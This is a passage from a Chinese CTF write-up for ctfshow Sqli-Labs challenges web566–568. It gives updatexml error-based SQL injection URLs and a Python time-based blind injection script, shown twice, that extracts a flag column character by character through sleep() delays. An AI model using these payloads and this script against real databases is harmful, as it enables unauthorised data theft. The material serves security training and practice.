http://e39b572e-e357-4c36-a5c6-938f53ae7946.challenge.ctf.show:8080/?sort=1' or updatexml(1,concat(0x3d,(select right(group_concat(flag4s),30) from ctfshow.flags)),1)%23

web566

可以写个时间盲注

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
# -- coding:UTF-8 --
# Author:孤桜懶契
# Date:2021/8/10
# blog: gylq.gitee.io

import requests
import time

url = "http://c2fd5b24-8246-4a1f-a529-b67bacd1f312.challenge.ctf.show:8080/"
flag = ""
#*************************************************************************************************************************************************************
#--------查库名
#sql="database()"
#--------查表
#sql= "SelecT(group_concat(table_name))from(information_schema.tables)where`table_schema`='ctfshow'"
#--------查字段
#sql= "SelecT(group_concat(column_name))from(information_schema.columns)where`table_schema`='ctfshow'||`table_name`='flags'"
#--------查flag
sql= "SelecT`flag4s`from(ctfshow.flags)"
#*************************************************************************************************************************************************************
payload = "?sort=if(ascii(substr(({}),{},1))>'{}',sleep(0.05),0)"
i = 0

for i in range(1,100):
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        url_get = url + payload.format(sql,i,mid)
        start = time.time()
        res = requests.get(url=url_get)
        end = time.time()
        print(end-start)
        if end-start > 0.5:
            head = mid + 1
        else:
            tail = mid
    if head != 32:
        print('[*] 开始盲注第{}位'.format(i))
        flag += chr(tail)
        print(flag)
    else:
        print('[*] Complete! Result Is >>> {}'.format(flag))
        break

web567

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
# -- coding:UTF-8 --
# Author:孤桜懶契
# Date:2021/8/10
# blog: gylq.gitee.io

import requests
import time

url = "http://85177ce8-3c71-4581-984f-06a432d68995.challenge.ctf.show:8080/"
flag = ""
#*************************************************************************************************************************************************************
#--------查库名
#sql="database()"
#--------查表
#sql= "SelecT(group_concat(table_name))from(information_schema.tables)where`table_schema`='ctfshow'"
#--------查字段
#sql= "SelecT(group_concat(column_name))from(information_schema.columns)where`table_schema`='ctfshow'||`table_name`='flags'"
#--------查flag
sql= "SelecT`flag4s`from(ctfshow.flags)"
#*************************************************************************************************************************************************************
payload = "?sort=if(ascii(substr(({}),{},1))>'{}',sleep(0.05),0)"
i = 0

for i in range(1,100):
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        url_get = url + payload.format(sql,i,mid)
        start = time.time()
        res = requests.get(url=url_get)
        end = time.time()
        print(end-start)
        if end-start > 0.7  :
            head = mid + 1 #ctfshow{6e5fc803-1b1e-4P1a-b7d5-8c6b2620e08a}
        else:
            tail = mid
    if head != 32:
        print('[*] 开始盲注第{}位'.format(i))
        flag += chr(tail)
        print(flag)
    else:
        print('[*] Complete! Result Is >>> {}'.format(flag))
        break

web568

1
http://3014ef4e-da57-4cda-8e9d-69e8b8789ae9.challenge.ctf.show:8080/?sort=1' or updatexml(1,concat(0x3d,(select right(group_concat(flag4s),20) from ctfshow.flags)),1)%23

本文标题:【ctfshow】web篇-Sqli-Labs wp

文章作者:孤桜懶契

发布时间:2021年08月09日 - 07:21:35

最后更新:2022年05月20日 - 11:47:45

原始链接:https://gylq.gitee.io/posts/87.html

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

-------------------本文结束 感谢您的阅读-------------------
欢迎光临
❤️
孤桜懶契
请多关照
❤️
❤️